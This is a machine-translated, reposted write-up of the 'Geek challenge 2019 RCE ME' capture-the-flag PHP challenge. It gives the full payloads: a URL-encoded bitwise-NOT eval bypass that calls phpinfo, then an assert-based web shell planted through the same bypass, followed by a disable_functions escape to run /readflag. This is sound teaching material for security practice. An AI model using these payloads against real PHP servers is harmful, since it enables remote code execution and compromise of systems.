当前位置:网站首页>[geek challenge 2019] rce me

[geek challenge 2019] rce me

2022-07-28 00:00:00 A new reading of the tea classic

[ Geek challenge 2019]RCE ME

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

The audit code knows , need get Pass value code, also code The length of cannot be greater than 40,code You can't take letters or numbers , Consider taking the opposite to bypass , structure payload:/?code=phpinfo();, Negate it :php -r "echo urlencode(~'phpinfo');" perhaps 

<?php
echo urlencode(~'phpinfo');
?>

php Online operation website :PHP Online tools | Rookie tools

obtain %8F%97%8F%96%91%99%90, So as to construct a new payload:/?code=(~%8F%97%8F%96%91%99%90)();

After entering, I found many disabled functions :

Next, construct shell:

php Assertion :assert — Check whether an assertion is false, If the argument is a string , It will be assert() treat as PHP Code to execute . write in shell:eval($_POST[shell]), The same method needs to be reversed :

/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%8C%97%9A%93%93%A2%D6);
# %9E%8C%8C%9A%8D%8B=assert
# %9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%8C%97%9A%93%93%A2%D6=eval($_POST[shell])

Here the system checks code Reverse to get :/?code=(assert)(eval($_POST[shell]));, then assert take eval($_POST[shell]) As php Code to execute , Write now shell, Go to ant sword

url:http://xxxxx.node4.buuoj.cn:81/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%8C%97%9A%93%93%A2%D6);

Found in the root directory flag, But can't read

Considering that web pages disable a large number of functions , So use the ant sword plug-in :disable_functions, Right click data -> Add plug-ins -> Auxiliary tool -> Bypass disable_functions-> And then choose PHP7_GC_UAF-> Click Start , Then type the command directly /readflag, You can get flag:

It's over , And the flower

原网站

版权声明
本文为[A new reading of the tea classic]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/208/202207272112595887.html

边栏推荐

猜你喜欢

随机推荐